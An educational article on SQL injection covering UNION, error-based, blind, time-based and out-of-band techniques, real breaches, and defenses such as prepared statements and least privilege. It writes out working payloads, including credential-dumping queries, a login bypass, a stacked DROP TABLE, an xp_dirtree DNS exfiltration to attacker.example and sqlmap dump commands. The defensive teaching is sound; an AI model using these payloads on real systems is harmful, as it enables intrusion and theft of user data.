SQL Injection Explained — How It Works, Common Attack Techniques, and Defenses

SQL injection (SQLi) is a vulnerability where user input is concatenated directly into an SQL statement so that the attacker ends up running queries against the database that should never have been permitted. The essence is that "data" and "code" live in the same string. The application thinks "this part is just data," but the database's parser interprets it as syntax. This article walks through the four families of SQLi (UNION / Blind / Time-based / Out-of-Band), authentication bypass, data dumping, and stacked-query examples, famous incidents like TalkTalk, Heartland, and MOVEit, and the layered defense centered on prepared statements.

What SQLi is — the mixing of data and code #

The root cause of SQL injection is that the application is building SQL statements by string concatenation.

A vulnerable implementation — SQL built by string concatenation

// PHP — the classic bad example
$id = $_GET['id'];
$sql = "SELECT name, email FROM users WHERE id = " . $id;
$result = mysqli_query($conn, $sql);

# Intended: ?id=42 → SELECT ... WHERE id = 42 # Attack: ?id=42 OR 1=1 → SELECT ... WHERE id = 42 OR 1=1 (returns every row)

The id parameter was intended as "a place where a number goes," but the database treats 42 OR 1=1 as part of the SQL grammar. OR is an SQL keyword, and the attacker has escaped from the "data position" into the "code position" inside the same string. That is the entire trick of SQLi.

▸ What happens the moment SQLi lands

The attacker inherits every privilege the database user has. In many setups that means (a) reading every table, (b) extracting password hashes, (c) tampering via UPDATE / DELETE, (d) reading and writing OS files through LOAD_FILE / INTO OUTFILE, and (e) executing OS commands via stored procedures like MS SQL's xp_cmdshell.

Where it sits in the OWASP Top 10 #

SQLi is the marquee item under A03:2021 Injection. Since Rain Forest Puppy publicly described it in 1998, it has been a central topic of web security for nearly thirty years. People often say "modern ORMs prevent SQLi," but whereRaw / DB::statement / hand-written SQL for N+1 avoidance / legacy systems / dynamic table or column names all step outside the ORM, and there are plenty of those moments.

Where it shows up #

The entry point isn't just HTML forms.

URL query parameters (?id=...)
POST bodies
HTTP headers (User-Agent, Referer, X-Forwarded-For — frequent in implementations that INSERT them into log tables)
Cookie values
JSON / XML / GraphQL payloads
File names (in implementations like SELECT ... WHERE filename = '...')
WebSocket messages

Treat "every string a user can influence" as a candidate.

The four families of SQLi #

SQLi splits into four families depending on how the payload ultimately retrieves information.

In-Band — UNION-based #

When the database response is visible in the page, UNION SELECT lets the attacker splice the contents of another table into the result set.

UNION dumps the users table

# Original SQL: SELECT title, body FROM posts WHERE id = ?
# Payload:
?id=1 UNION SELECT username, password_hash FROM users -- 
# What the DB actually runs:
SELECT title, body FROM posts WHERE id = 1
UNION SELECT username, password_hash FROM users --

# The "title / body" cells in the UI now display rows from users

The fastest way to exfiltrate data. Requirements: (a) the query result is visible, (b) you can match the column count, (c) you can comment out the trailing fragments with -- # /* */.

In-Band — Error-based #

If the page leaks DB error messages, you can deliberately trigger a type error that embeds the database content in the error string.

MySQL — extractvalue leaks the database name through the error

?id=1 AND extractvalue(1, concat(0x7e, (SELECT database())))

# Error: XPATH syntax error: '~mydb_production' # → the database name leaks out of the error message

This is "Error-based SQLi." The number-one reason production should not display DB error details.

Blind — Boolean-based #

Even when neither the response body nor a DB error is returned, you can extract one bit at a time by making the truthy and falsy cases look different.

Recover a password hash, character by character

?id=1 AND substring((SELECT password FROM users WHERE id=1),1,1)='a'
# → true: normal page; false: 404 / empty

?id=1 AND substring((SELECT password FROM users WHERE id=1),1,1)='b' # → brute-force the first character over 0-9 a-z

Tedious by hand, but sqlmap and friends finish a character in milliseconds.

Blind — Time-based #

When responses are byte-for-byte identical regardless of truth value, SLEEP() introduces a difference in response time to leak data.

Leak one bit using a conditional SLEEP

?id=1 AND IF(substring((SELECT password FROM users WHERE id=1),1,1)='a', SLEEP(5), 0)

# 5-second delay → the first character is 'a' # instant response → try the next character

Every DBMS has its own dialect: pg_sleep() (PostgreSQL), WAITFOR DELAY (MS SQL), dbms_pipe.receive_message (Oracle). The hardest variant to detect.

Out-of-Band (OOB) #

When neither the response nor a timing channel works, make the database speak to the outside world — embed data in DNS or HTTP requests so the attacker's listener receives it.

MS SQL — leak via DNS using xp_dirtree

; DECLARE @data varchar(1024);
SELECT @data = (SELECT TOP 1 password FROM users);
EXEC('master..xp_dirtree "\\' + @data + '.attacker.example\foo"');

# A DNS query hash_value.attacker.example arrives at the attacker's authoritative DNS

Receive it with Burp Collaborator or a custom DNS listener. The last resort in environments where even Blind is hard.

Canonical attack scenarios #

Authentication bypass — the oldest classic #

Slip past a login form

// Vulnerable login handler
$sql = "SELECT * FROM users WHERE user='" . $u . "' AND pass='" . $p . "'";
# Attack:
user: admin' -- 
pass: (anything)

# Actual SQL: SELECT * FROM users WHERE user='admin' -- ' AND pass='...' # The password condition is commented out → logged in as admin

' OR '1'='1 style payloads have been in textbooks since 1998, but they still land on legacy systems and homegrown frameworks today.

Bulk data dump #

Walk information_schema.tables → information_schema.columns → table contents (users, payment_cards, sessions...) in sequence. sqlmap --dump-all automates the entire path.

File reads (LOAD_FILE) #

If the DB process has permission to read OS files, LOAD_FILE('/etc/passwd') and friends drag those files into the response. Configuration files, private keys, application settings (.env) — all exposed.

Stacked queries (`;`-joined) for tampering #

APIs that allow multiple statements per request — mysqli_multi_query, MS SQL — accept things like ; DROP TABLE users; -- for outright destruction or tampering. PHP's standard PDO::prepare path does not allow ; chaining, which is a small saving grace.

Escalation to OS command execution #

If the DB has a feature for executing OS commands, SQLi becomes immediate RCE.

MS SQL — xp_cmdshell (recommended off by default)
PostgreSQL — COPY ... FROM PROGRAM (9.3+)
MySQL — load a UDF (User Defined Function) via INTO OUTFILE
Oracle — via Java stored procedures

In real engagements SQLi rarely stays SQLi. It tends to be the front door of SQLi → RCE → lateral movement → ransomware.

Attack steps — the path the attacker walks #

Real attacks usually go through these phases in order.

1. Detection

Send a single ' and see if you get a 500, a DB error, or a difference in response. Classic payloads like ' OR '1'='1 reveal behavioral change.

2. DBMS fingerprinting

Identify MySQL / PostgreSQL / MS SQL / Oracle / SQLite by error wording and function behavior (VERSION() vs @@version vs SELECT banner). The dialect changes the attack.

3. Read the query shape

Probe the column count (the boundary where ORDER BY n starts to error) and data types (UNION SELECT NULL,NULL,...).

4. Schema enumeration

Retrieve table and column names via information_schema.tables → columns. Prioritize users, accounts, secrets.

5. Data exfiltration

Pull password hashes, PII, card numbers, session IDs. Automate with sqlmap --dump.

6. Escalation

If privileges allow, write a web shell via INTO OUTFILE, get RCE through xp_cmdshell, pivot. Crack the hashes offline with Hashcat.

sqlmap runs steps 1–5 mostly automatically. There are real situations where sqlmap -u "https://target/page?id=1" --batch --dump is enough.

Notable SQLi incidents #

Heartland Payment Systems (2008) #

The payment giant Heartland lost roughly 134 million card records to a SQLi-driven breach. Albert Gonzalez (the same operator behind the TJX breach) used SQLi to enter the internal network and dropped a sniffer next to PIN pads. The breach happened despite PCI DSS certification, which forced the industry to admit the limits of the standard. Heartland paid roughly $140M in fines and settlements.

TalkTalk (2015) #

UK telecom TalkTalk lost personal data on around 160,000 customers, including names, addresses, dates of birth, and bank account details, to SQLi. The attackers were two teenagers, 15 and 16, who hammered a known, unpatched SQLi vulnerability with sqlmap. The ICO levied £400,000 — at the time, the largest DPA fine ever issued in the UK — and CEO Dido Harding resigned.

Sony Pictures (2011) #

LulzSec used SQLi to break into Sony Pictures and dumped over a million user IDs, passwords, addresses, and birthdays — passwords stored in plaintext. The attackers themselves bragged that "the SQLi took about as many cookies as a snack break," and the breach kicked off the "LulzSec Summer of Lulz" stream of attacks.

MOVEit Transfer (2023) #

Strictly speaking, MOVEit is not stand-alone SQLi but a supply-chain campaign by the CL0P ransomware group, kicked off by an SQLi vulnerability (CVE-2023-34362) in progress.ipsworks.moveit.*. Over 2,700 organizations and 90 million individuals were affected, making it the largest SQLi-rooted incident on record. The breach hit US federal and state agencies, large banks, universities, and healthcare providers, with estimated total damages above $15 billion. Proof that SQLi is still a giant threat today.

Takeaway #

The common thread: SQLi is not "a legacy bug from 20 years ago." It can be the entry point for modern, massive supply-chain attacks. Breach one company's database, and thousands of downstream organizations get rolled up with it.

Defenses — layered #

The core principle is to never let user input be interpreted as SQL syntax. Prepared statements achieve that; everything else is an additional layer.

Prepared statements (parameterized queries) — the headline defense #

The SQL grammar is sent to the database first, the data is bound afterwards. Whatever ends up in the data slot is never re-parsed as syntax.

PHP PDO — the right way

$stmt = $pdo->prepare("SELECT name, email FROM users WHERE id = ?");
$stmt->execute([$_GET['id']]);
$user = $stmt->fetch();

# Even if ?id=42 OR 1=1 arrives, it flows in as the value "42 OR 1=1" # The DB treats it as a value, not as syntax — attack fails

Language / FW	Safe pattern
PHP	`PDO::prepare` + `execute([$param])`
Laravel	Eloquent / Query Builder (binds automatically)
Node.js	`mysql2`/`pg` placeholders (`?` or `$1`)
Python	`cursor.execute(sql, (param,))` (`%s` placeholder)
Java	`PreparedStatement` + `setString` / `setInt`
Go	`db.Query("... WHERE id = ?", id)`
.NET	`SqlCommand` + `Parameters.AddWithValue`

▸ "Just escape with sprintf" is not a fix

"Pass it through mysqli_real_escape_string and then sprintf" is not a defense. It only escapes quotes inside strings; if you concatenate a numeric column without quotes, the attack still lands. Prepared statements are fundamentally different — they separate value from grammar.

Dynamic identifiers (table or column names) #

Prepared statements bind values. You cannot bind identifiers like table names, column names, ORDER BY columns, or ASC/DESC. If those have to be dynamic, gate them through an allow-list of permitted names.

Allow-listing a dynamic ORDER BY

$allowed = ['created_at', 'name', 'price'];
$column = in_array($_GET['sort'], $allowed) ? $_GET['sort'] : 'created_at';
$sql = "SELECT * FROM products ORDER BY " . $column;

Principle of least privilege #

Give the DB user the application uses only the privileges it actually needs.

Don't grant DROP, ALTER, FILE, CREATE USER and other DDL/admin rights to the general web role
Block INTO OUTFILE / LOAD_FILE (strip the FILE privilege)
Keep OS-command features like xp_cmdshell off by default
Read-only views should use a SELECT-only role
Separate different applications into different DB users

Least privilege does not prevent SQLi, but it minimizes the blast radius when SQLi succeeds. It is the most important supplementary defense.

WAF (Web Application Firewall) #

Cloudflare / AWS WAF / ModSecurity block known SQLi patterns at the request layer. Not a root-cause fix — /**/ comment insertion, Unicode escapes, HTTP Parameter Pollution all bypass WAFs regularly — but useful as a stopgap against zero-days.

Suppress error messages #

In production, do not leak DB error messages to the user. In Laravel: APP_DEBUG=false. In PHP: display_errors=Off. In .NET: customErrors mode="On". Keep stack traces in logs, return a generic 500 page. This physically removes the attack surface for Error-based SQLi.

Input validation #

"Numeric columns accept numbers only," "email fields validate format," "enums use an allow-list." Pass only the semantically valid input through. A complementary layer on top of prepared statements.

SAST / code review #

Detect "SQL built by string concatenation" via static analysis tools such as Semgrep, CodeQL, and SonarQube. Practically, the highest-yield move is grepping for non-standard "raw SQL" APIs that frameworks provide (whereRaw in Laravel, query in TypeORM, etc.) and reviewing each call site.

▸ Grepping for "raw SQL" finds 90% of it

Most SQLi clusters around uses of non-standard APIs. A single grep -rn 'whereRaw\|DB::statement\|DB::raw\|mysqli_query\|exec(.*SQL' sweep, followed by review, eliminates the vast majority of SQLi in a modern stack that defaults to auto-escaping.

Limits of ORMs #

ORMs like Eloquent, ActiveRecord, and TypeORM are the workhorse defense — but there are method calls where passing user input directly still breaks.

Danger	Example
`whereRaw($input)`	`whereRaw($request->q)` pipes the whole string into SQL
`orderByRaw`	Same — builds `ORDER BY` syntax from the input
`selectRaw`	Raw column expressions
`DB::statement`	Runs arbitrary SQL
Dynamic table name	`Model::from($input)`

These exist as "convenient escape hatches," but accepting user input through them is a direct SQLi.

Testing and detection #

Manual testing #

Minimal probe payloads:

First strings to throw at every parameter

'                                # a single quote — does the page 500 / show errors?
"                                # a double quote
' OR '1'='1                      # the classic auth-bypass
' OR 1=1 --                     # with a trailing comment
1 AND SLEEP(5) --               # Time-based
1; WAITFOR DELAY '0:0:5' --     # MS SQL time-based

Any change in response body, response time, or HTTP status is suspicious.

Automated tools #

sqlmap — the de facto open-source standard. Handles web forms, REST APIs, GraphQL
Burp Suite Pro Scanner — commercial, high precision
OWASP ZAP — open-source dynamic scanner
NoSQLMap for MongoDB and friends

A canonical invocation: sqlmap -u "https://target/path?id=1" --batch --random-agent --level=3 --risk=2.

Static analysis (SAST) #

Semgrep — taint-mode follows data flow from "user input" to "SQL construction"
CodeQL — GitHub's SAST; built-in queries like js/sql-injection, python/sql-injection
SonarQube — commercial, broad rule set

Wire it into CI and catch SQLi at PR time.

Monitoring in production #

Alert on WAF / DB proxy hits for keywords like UNION SELECT, SLEEP(, information_schema, xp_cmdshell, LOAD_FILE. You can often spot the recon phase before the breach lands.

Related and confused with #

Attack	Relationship
NoSQL Injection	Query languages for MongoDB / Redis / Elasticsearch have the same class of bug. Object injection like `{$gt: ""}` or JS-evaluating operators like `$where` are representative
ORM Injection	A bug where user input flows into ORM method arguments (filter / where) and changes the generated SQL. `whereRaw` family is typical
LDAP Injection	Injection into LDAP filters such as `)(uid=`
XPath Injection	Injection into XML-parsing applications. Structurally similar to SQLi
Server-Side Template Injection (SSTI)	Code injection into template engines (Jinja2, Twig). Same "data-and-code-mixed" disease in another flavor

"We use an ORM, so we don't have SQLi" and "NoSQL doesn't have SQLi" are both wrong. The problem is mixing syntax with values, not whether you're using SQL specifically.

Wrap-up — six things every developer should hold #

SQLi has been known for nearly thirty years, and MOVEit (2023) shows it is still a top-tier threat. The realistic answer is to abolish string concatenation entirely and stack least privilege and other defenses on top.

▸ Six things to hold as a developer

Use prepared statements / ORMs to separate values from grammar — no exceptions
Allow-list dynamic identifiers (table names, ORDER BY columns)
Grant the application DB user only least privilege (no DDL / FILE / admin)
Do not display DB error messages in production (kill the Error-based attack surface)
Review the escape hatches (whereRaw, DB::statement...) by grep
Wire SAST (Semgrep / CodeQL) into CI and catch SQLi at PR time

The reason SQLi has sat in the OWASP Top 10 for thirty years isn't that it's hard to defend — it's that "string concatenation feels intuitive." Build the habit of prepared statements across the organization and SQLi becomes a preventable bug.